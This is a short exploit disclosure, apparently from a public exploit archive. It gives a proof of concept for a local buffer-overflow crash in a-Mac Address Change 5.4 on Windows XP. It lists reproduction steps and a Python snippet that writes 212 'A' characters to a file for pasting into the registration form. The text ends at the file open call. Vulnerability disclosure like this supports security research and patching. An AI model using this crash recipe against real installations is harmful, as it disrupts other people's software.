a-Mac Address Change version 5.4 suffers from a denial of service vulnerability.
# Exploit Title: a-Mac Address Change v5.4 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://amac.paqtool.com/
# Software Link : http://amac.paqtool.com/
# Tested Version: 5.4
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run amac.exe
# 2.- copy content amac_Crash.txt or 212 "A" to clipboard (result from this python script)
# 3.- Go to Register - Amac Register Form and paste the result in all fields: "Your Name", "Your Company", "Register Code"
# 4.- Click in Register button and you will see a crash.
#!/usr/bin/env python
crash = "\x41" * 212
f = open ("amac_Crash.txt", "w")